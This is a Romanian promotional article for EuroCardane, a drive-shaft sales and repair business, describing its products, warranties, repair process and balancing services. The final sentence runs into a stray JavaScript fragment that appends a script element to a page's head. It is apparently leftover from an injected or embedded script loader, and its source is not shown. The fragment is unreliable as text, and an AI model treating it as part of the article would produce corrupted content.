cardaneAtunci cand ai o problema cu cardanul masinii, trebuie sa o rezolvi cat mai repede posibil. Fie ca exista posibilitatea sa il repari sau daca trebuie sa cumperi unul nou, firma EuroCardan iti sta la dispozitie cu cardane pentru numeroase modele auto, la preturi accesibile.

EuroCardane are ca principal obiectiv de activitate nu doar vanzari cardane , ci si reparatiile acestora. Nu stiti de ce model de cardan aveti nevoie? Tot ce trebuie sa faceti este sa comunicati firmei seria sau dimensiunile acestuia. Orice produs achizitionat de pe EuroCardane.ro beneficiaza de 24 de luni garantie si de asemenea, veti beneficia de oferte avantajoase daca detineti un magazin de piese auto sau un service si alegeti sa colaborati cu aceasta companie.

La EuroCardane puteti gasi cardane pentru numeroase brand-uri de masini, precum: Renault, Mercedes, Touareg, Iveco si altele. Indiferent de modelul autoturismului pe care il aveti, echipa de specialisti va gasi o solutie in cel mai scurt timp.

Ce este un cardan?

Cardanul este o piesa de transmisie intalnita la masinile 4×4 sau cu tractiune spate. Cardanul este teava de otel care strabate masina din fata, de la motor,  pana in spate, la diferential. Cardanul poate face legatura intre cutie si diferential sau intre motor si cutie, in cazul masinilor cu cutia montata in spate. Cardanul poate fi construit dintr-o singura bucata sau articulat.

EuroCardane ofera servicii de reparatii cardane

In cazul in care nu este naparat nevoie de cardan nou echipa va efectua reparatia prin inlocuirea totala a elementelor defecte cu piese originale. In cazul in care operatiunea de reparare necesita ca piesele sa fie asamblate prin sudura, elementele defecte sunt taiate si inlocuite. Piesele vechi nu se reconditioneaza, de aceea cardanele reparate beneficiaza de 6 luni garantie in orice tara europeana.

Termenul de executie este de maxim 24 de ore, iar lucrarea se efectueaza doar cu piese care au calitate OE avand siguranta si garantia ca la EuroCardane va puteti procura intotdeauna piesele de care aveti nevoie la cele mai avantajoase preturi. Aparatura folosita este de ultima generatie si in cazul unui cardan reparat pretul nu depaseste in general 50 % din valoarea cardanului nou la o calitate echivalenta.

Ce alte servicii ofera EuroCardane?

Echipa de profesionisti va efectua si echilibrare dinamica dupa reparatie pentru o perfecta functionare in conditii de rulaj. In ateleierul firmei se pot repara caradane pentru autoturisme, masini agricole,  autoutilitare, camioane, vehicule off-road sau aplicatii industriale. Service-ul firmei este dotat cu aparate computerizate de ultima generatie destinate acestei activitati.

Mecanicii firmei EuroCardane beneficiaza atat de cunostintele si pregatirea necesare, cat si de aparatura adecvata pentru a executa reparatia sau vanzarea cardanelor. Pe langa serviciile oferite, specialistii companiei sunt dispusi sa va ofere raspunsuri la intrebarile sau nelamuririle dumneavostra. In acest fel, va veti convinge ca EuroCardane ofera nu doar produse, ci si servicii de cea mai buna ciliate, la preturi avantajoase. Evitati sa fiti pacalititi de amatori.  Apllati cu incredere la firma EuroCardane si va veti convinge.d.getElementsByTagName(‘head’)[0].appendChild(s);